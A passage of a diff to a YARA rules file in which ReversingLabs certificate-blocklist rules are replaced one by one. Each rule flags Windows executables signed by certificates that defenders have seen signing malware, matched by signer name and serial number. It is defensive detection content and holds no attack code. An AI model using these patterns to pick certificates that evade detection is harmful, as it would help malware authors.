-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "5c:88:31:3b:d9:8b:de:99:c9:b9:ac:14:08:a6:32:49" and 1474243200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unicom Ltd" and ( pe.signatures [ i ] . serial == "00:fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" or pe.signatures [ i ] . serial == "fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" ) and 1603958571 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7A632A6Ecfc6C49Ec1F42F76 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0E6F4Cb8B06E01C3Bd296Ace3A95F814 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "863a109c-034f-5168-9470-8fd4945e6e92"
+		id = "7a829a63-eeb4-50ef-829d-fc13572c1148"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13874-L13890"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "038badeab61c00476b79684308bf91f8a63716641f2be16fe0a3b25ebd3a9a1e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6828-L6844"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f3184a9d1fe2a1cf2dcc04d26c284aa9a651d2f00aa28642d7f951550a050138"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17935,21 +42600,21 @@ rule REVERSINGLABS_Cert_Blocklist_7A632A6Ecfc6C49Ec1F42F76 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "7a:63:2a:6e:cf:c6:c4:9e:c1:f4:2f:76" and 1474959780 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVATON, s.r.o." and pe.signatures [ i ] . serial == "0e:6f:4c:b8:b0:6e:01:c3:bd:29:6a:ce:3a:95:f8:14" and 1603957781 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F57Df6A6Eee3854D513D0Ba8585049B7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_085B70224253486624Fc36Fa658A1E32 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b31f73d5-ff9e-5be7-b806-8838ddb5d29d"
+		id = "7d27604e-4ecd-559c-9180-4914e7f1f6c9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13892-L13910"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "09d5998960fb65eda56cd698c5ff50d87ba7a811cbb128bc7485c0f124e14cba"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6846-L6862"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "50ff48a421a109f8c6bf92032691d9b673945bc591005004ff17dc18c97d4aea"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17959,21 +42624,21 @@ rule REVERSINGLABS_Cert_Blocklist_F57Df6A6Eee3854D513D0Ba8585049B7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "smnetworks" and ( pe.signatures [ i ] . serial == "00:f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7" or pe.signatures [ i ] . serial == "f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7" ) and 1277769600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Best Fud, OOO" and pe.signatures [ i ] . serial == "08:5b:70:22:42:53:48:66:24:fc:36:fa:65:8a:1e:32" and 1597971601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Ac5Ac5D323122E6D8E92D6E191B1432 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_51Cd5393514F7Ace2B407C3Dbfb09D8D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9a363a84-c21c-5afe-9812-9ce16962b28a"
+		id = "ac86893f-2edd-5f1c-96eb-4cb140e8e001"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13912-L13928"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d5e62d3cdfacfaea70f9ee11230501bb9c4099508077d50a2a143cb69476f02a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6864-L6880"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4cd08b9113a7c1f4f2d438ac59ad0be503daded3a08b8c8e8ce3e0dfdddf259e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17983,21 +42648,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Ac5Ac5D323122E6D8E92D6E191B1432 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Certified Software" and pe.signatures [ i ] . serial == "0a:c5:ac:5d:32:31:22:e6:d8:e9:2d:6e:19:1b:14:32" and 1140134400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APPI CZ a.s" and pe.signatures [ i ] . serial == "51:cd:53:93:51:4f:7a:ce:2b:40:7c:3d:bf:b0:9d:8d" and 1605299467 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2433D9Df7Efbccb870Ee5904D62A0101 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B72179C027B9037Ee220E81Ab18Fe56D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6cd46771-06ea-51c9-ad84-4b28f4f8442b"
+		id = "85639e74-80b0-59c6-b31b-5b3d9587b37a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13930-L13946"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "92a2effe1b94345f52130e4cb1db181f1990e58eaefb9c74375c14249cc1be22"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6882-L6900"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1416768011ff824307d112bdeecce1ad50d1f673e92bef8fddbbeb58ff98b1b1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18007,21 +42672,21 @@ rule REVERSINGLABS_Cert_Blocklist_2433D9Df7Efbccb870Ee5904D62A0101 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Conpavi AG" and pe.signatures [ i ] . serial == "24:33:d9:df:7e:fb:cc:b8:70:ee:59:04:d6:2a:01:01" and 1322438400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Planeta, TOV" and ( pe.signatures [ i ] . serial == "00:b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d" or pe.signatures [ i ] . serial == "b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d" ) and 1603381300 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_462Baada57570F70Df76D10B9E7Bf2B7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07B74C70C4Aa092648B7F0D1A8A3A28F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2863a050-ebce-5322-b64a-9160adf6cc21"
+		id = "f941b7d6-f168-57aa-881a-54679a2b948c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13948-L13964"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c48207907339ce3fb7b6bc630097761a24495a9d4e69d421f2bdb36ddc92abcb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6902-L6918"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "97759fa2e519936115f0493e251f9abc0cce3ada437776a5a370388512235491"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18031,21 +42696,21 @@ rule REVERSINGLABS_Cert_Blocklist_462Baada57570F70Df76D10B9E7Bf2B7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "46:2b:aa:da:57:57:0f:70:df:76:d1:0b:9e:7b:f2:b7" and 1551744000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rad-Grad D.O.O." and pe.signatures [ i ] . serial == "07:b7:4c:70:c4:aa:09:26:48:b7:f0:d1:a8:a3:a2:8f" and 1603240965 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_83320D93Dd8Cf16D11F99B1078B0A7Cb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4C8Def294478B7D59Ee95C61Fae3D965 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "12ce9be9-4644-5b59-aed2-ce4b04fcc46a"
+		id = "549249df-690c-5b75-ac1a-77b509c9e163"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13966-L13984"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "94ec5e05357767cc0c4cd1fc8ff6d1a366359ba699c43f3710204d761e7e707f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6920-L6936"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3b7b10afa5f0212bd494ba8fe32bef18f2bbd77c8ab2ad498b9557a0575cc177"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18055,21 +42720,21 @@ rule REVERSINGLABS_Cert_Blocklist_83320D93Dd8Cf16D11F99B1078B0A7Cb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb" or pe.signatures [ i ] . serial == "83:32:0d:93:dd:8c:f1:6d:11:f9:9b:10:78:b0:a7:cb" ) and 1524614400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM SECURITY USA INC" and pe.signatures [ i ] . serial == "4c:8d:ef:29:44:78:b7:d5:9e:e9:5c:61:fa:e3:d9:65" and 1592961292 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_10Bae1D20Cb4Cc36A0Ffac86 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7D36Cbb64Bc9Add17Ba71737D3Ecceca : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a07d1c35-0026-526a-bf08-e6b07008da03"
+		id = "ce10840c-150d-5ecd-ab9a-7bc96092ebfd"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13986-L14002"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "44e91fbf4da8e81859a21408ee9f1971f1e8f48d22553fcaa6469156d4a0670b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6938-L6954"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5874860582ed5be6908dca38e6ecae831eeeb0c2b768e8065ada9fd5ac2bda89"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18079,21 +42744,21 @@ rule REVERSINGLABS_Cert_Blocklist_10Bae1D20Cb4Cc36A0Ffac86 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "10:ba:e1:d2:0c:b4:cc:36:a0:ff:ac:86" and 1476773830 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LTD SERVICES LIMITED" and pe.signatures [ i ] . serial == "7d:36:cb:b6:4b:c9:ad:d1:7b:a7:17:37:d3:ec:ce:ca" and 1616025600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_230716Bfe915Dd6203B2E2A35674C2Ee : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ad255D4Ebefa751F3782587396C08629 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "849c390e-f81f-558e-88a3-19242c127a56"
+		id = "e42d2881-efda-5aa0-b455-dabbd3a77e97"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14004-L14020"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0197ff46ceb1017488da4383436fd0ddc375904f36cc16c5a8ef21d633ec387c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6956-L6974"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "43f44cbedf37094416628c9df23767be3b036519f93222812597777a146ecb24"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18103,21 +42768,21 @@ rule REVERSINGLABS_Cert_Blocklist_230716Bfe915Dd6203B2E2A35674C2Ee : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "23:07:16:bf:e9:15:dd:62:03:b2:e2:a3:56:74:c2:ee" and 1472169600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ornitek" and ( pe.signatures [ i ] . serial == "00:ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" or pe.signatures [ i ] . serial == "ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" ) and 1614643200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_36A77D37E68E02Fd3D043C7197E044Ca : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_262Ca7Ae19D688138E75932832B18F9D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "721e48fb-3046-5b2d-8ad9-ae340e598794"
+		id = "7151fd62-7f6c-59d7-800b-65e5b4db279b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14022-L14038"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fc13ac5880cc2c8eac9ff8d09f6c5c2055b2de54d460a284936a4f6cd78192e8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6976-L6992"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a5bb946c6199cd47a087ac26f0a996261318d1830191ea7c0e7797ff03984558"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18127,21 +42792,21 @@ rule REVERSINGLABS_Cert_Blocklist_36A77D37E68E02Fd3D043C7197E044Ca : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Direct Systems Ltd" and pe.signatures [ i ] . serial == "36:a7:7d:37:e6:8e:02:fd:3d:04:3c:71:97:e0:44:ca" and 1515542400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bisoyetutu Ltd Ltd" and pe.signatures [ i ] . serial == "26:2c:a7:ae:19:d6:88:13:8e:75:93:28:32:b1:8f:9d" and 1616025600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_73Bff2Fb714F986C1707165F0B0F2E0E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_59A57E8Ba3Dcf2B6F59981Fda14B03 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f014b446-0ddc-51df-898c-200bd60181a0"
+		id = "12c80895-57fd-5341-b3ef-d59c25d4c234"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14040-L14056"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d79ab926cbc0049d39f5f4c6e57afc71b1a30311a4816fdb66a9c2e257cc84af"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6994-L7010"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6e77c7d0bd7e5e9bc8880cc6ffc3f5f4f738e3dde22c270ad7a6f6672a99de53"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18151,21 +42816,21 @@ rule REVERSINGLABS_Cert_Blocklist_73Bff2Fb714F986C1707165F0B0F2E0E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tecnopolis Consulting Ltd" and pe.signatures [ i ] . serial == "73:bf:f2:fb:71:4f:98:6c:17:07:16:5f:0b:0f:2e:0e" and 1090886400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Medium LLC" and pe.signatures [ i ] . serial == "59:a5:7e:8b:a3:dc:f2:b6:f5:99:81:fd:a1:4b:03" and 1609113600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_33B24170694Ca0Cf4D2Bdf4Aadf475A3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Aebe117A13B8Bca21685Df48C74F584D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c02d7aaf-e88a-5aba-a8ee-db34562e53b1"
+		id = "ec525737-9770-585e-922a-43f14e0a4a37"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14058-L14074"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "795bcb46b41ded084e4d12d98e335748ec1db3e0abbbb2d933e819d955075138"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7012-L7030"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e7fbc1f32adec39c94dc046933e152cd6d3946da4a168306484b7b6bc7f26fb6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18175,21 +42840,21 @@ rule REVERSINGLABS_Cert_Blocklist_33B24170694Ca0Cf4D2Bdf4Aadf475A3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "33:b2:41:70:69:4c:a0:cf:4d:2b:df:4a:ad:f4:75:a3" and 1474934400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NANAX d.o.o." and ( pe.signatures [ i ] . serial == "00:ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" or pe.signatures [ i ] . serial == "ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" ) and 1613520000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3A9Bdec10E00E780316Baaebfe7A772C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Dcd19A94535F034Ee36Af4676740633 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "56f62454-84a1-5843-b2f4-fa84b37040f3"
+		id = "c09778b6-17c9-5b24-8977-1bd998083c23"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14076-L14092"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ea9bc11efd2969f6b7112338f2b084ea3551e072e46b1162bd47b08be549cdd4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7032-L7048"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7079d4f1973ad4de21e1f88282c94b11c4d63f8bad12b35ef76a481e154d9da3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18199,21 +42864,21 @@ rule REVERSINGLABS_Cert_Blocklist_3A9Bdec10E00E780316Baaebfe7A772C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN ALPHA LIMITED" and pe.signatures [ i ] . serial == "3a:9b:de:c1:0e:00:e7:80:31:6b:aa:eb:fe:7a:77:2c" and 1556582400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toko Saya ApS" and pe.signatures [ i ] . serial == "7d:cd:19:a9:45:35:f0:34:ee:36:af:46:76:74:06:33" and 1609200000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Cad9C37F7Affa8F4D8229F97607E265 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ca4822E6905Aa4Fca9E28523F04F14A3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dae6b474-e4f0-5c73-b32e-d2680f508799"
+		id = "004454a0-20f9-58f5-8c24-8097f7586c5b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L14094-L14110"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0f88989c64bece23e7eccf8022e038fdd9c360766de71268cf71616f74adc56c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L7050-L7068"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9633f3494e9ece3a698d47c5ba2b7ee7f82cee4be36ac418c969c36285c4963c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18223,21 +42888,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Cad9C37F7Affa8F4D8229F97607E265 : INFO FILE
 		importance = 25
 
 	condition:
